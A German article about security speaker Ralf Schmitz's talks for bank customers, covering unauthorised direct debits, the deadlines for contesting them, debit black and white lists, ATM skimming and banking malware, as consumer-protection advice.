Ralf Schmitz, Ethical Hacker, erlebt immer wieder Bankkunden in seinen Hackervorträgen, die ihm atemraubende Geschichten erzählen. So hat eine ältere Dame über 20.000 Euro verloren oder ein junges Ehepaar ohne erklärbaren Grund monatlich Abbuchungen von 50 Euro zu verzeichnen.

Sicherheitsexperte Ralf Schmitz gibt in seinen Bankenvorträgen regelmäßig Tipps, was man bei ungenehmigten Kontoabbuchungen tun sollte und wie man sich vor Missbrauch schützen kann. Im Juni wird er wieder bei der Volksbank Hohenlimburg auftreten und die neusten Gefahren vorstellen.

Internetkriminelle werden immer raffinierter

Woher die Internetkriminellen von der älteren Dame ihren Namen und die Bankverbindung hatten, konnte sie nicht nachvollziehen. So geht es vielen Betroffen, weiß Ralf Schmitz zu berichten. Doch dass die Betrüger über Monate hinweg mit diesen gestohlenen Daten nicht nur immer wieder Mobilfunkverträge auf den Namen der alten Damen abschließen konnten, hat sie ziemlich erschreckt.

Die Mobilfunkfirma schickte ihr stets Rechnungen für diese Leistungen und versuchte, die Beträge abzubuchen. Sie ließ das Geld zurückbuchen, nahm die Einzugsermächtigung zurück und brachte die Vorfälle bei der Polizei zur Anzeige.

Leider liegen mittlerweile hunderttausende Anzeigen auf den Bürotischen der Polizei, weiß der Ex-Polizeibeamte Schmitz zu berichten. Eine Aufklärung ist sehr schwierig, da vielen Polizeibeamten die Erfahrung in Sachen Internetbetrug fehlt. Nur spezielle Abteilungen kennen sich damit aus.

Am Ende wechselte die ältere Dame entnervt die Kontoverbindung. Doch noch lange nach dem ersten Vorfall fand sie immer wieder unautorisierte Rechnungen ihres Mobilfunkanbieters im Briefkasten und es gab vergebliche Abbuchungsversuche von ihrem alten, schon längst nicht mehr existierenden Konto.

Fristen müssen eingehalten werden

Doch wie lange man bei seiner Bank Widerspruch gegen eine Abbuchung einlegen kann, hängt von der jeweiligen Art der Abbuchung ab. Handelt es sich um eine „unautorisierte Abbuchung“ – hat also jemand einen Betrag vom Konto abgebucht, ohne dass die Erlaubnis des Kontoinhabers dazu vorlag – kann man innerhalb von 13 Monaten nach dem Abbuchungstag bei der Bank widersprechen. „Wichtig ist trotzdem, dass man die Bank sofort in Kenntnis setzt, sobald man die Abbuchung bemerkt“, erzählt Ralf Schmitz. Bei sogenannten „autorisierten Abbuchungen“ hat der Betroffene hingegen nur acht Wochen Zeit, um bei seiner Bank Widerspruch einzulegen und die betreffende Summe zurückbuchen zu lassen.

Bei Lastschriften muss die Bank prüfen

Generell gilt: Bei Lastschriften muss die Bank prüfen, ob der Abbuchende auch autorisiert ist, die Abbuchung durchzuführen. Gibt es Streit über die Autorisierung, muss die Bank ihre Aufzeichnungen über die Autorisierung vorlegen. „Während die Banken bei Fällen von Bandenkriminalität in der Regel kulant sind, ist es durchaus möglich, dass man sich in Einzelfällen mit der Bank streiten muss“, so der Sicherheitsexperte Schmitz. Eine Möglichkeit, um wiederholte unrechtmäßige Abbuchungen zu verhindern, sind sog. „Black Lists“ (schwarze Listen) oder „White Lists“ (weiße Listen). Auf der „schwarzen Liste“ kann man seiner Bank mitteilen, wer auf keinen Fall Geld vom Konto abbuchen darf. Mit solchen Listen weiß die Bank von vornherein, wer abbuchen darf – und wer nicht.

Unberechtigte Kontoabbuchungen?
Unberechtigte Kontoabbuchungen?

Skimming-Schäden gehen in die Million

Es kann nicht nur durch Abbuchungen Geld vom Konto verschwinden. Auch durch das sogenannte „Skimming“, bei dem Betrüger Geldautomaten manipulieren und so an die Kartendaten inklusive PIN gelangen, kann ein Missbrauch stattfinden. Im Darknet gibt es die Platten und Software, um die Geräte zu manipulieren, weiß der Sicherheitsexperte Schmitz und zeigt in seinen Vorträgen, wie man sich schützen kann.

Eine weitere Möglichkeit besteht darin, dass Hacker Schadsoftware auf den Rechner oder Mobilgeräte der Bankkunden einschleusen. Diese Software spioniert dann Bankdaten aus. Die Täter erhalten dadurch Zugriff auf das Konto und können dann selbst Überweisungen tätigen. Kleiner Wermutstropfen: Ist der Verlust im Rahmen von Skimming entstanden, kommt in der Regel das Kreditinstitut für den entstandenen Schaden beim Kunden auf.

Trotzdem sollte im Internet jeder sehr vorsichtig agieren und einen siebten Sinn für Betrugsmaschen entwickeln.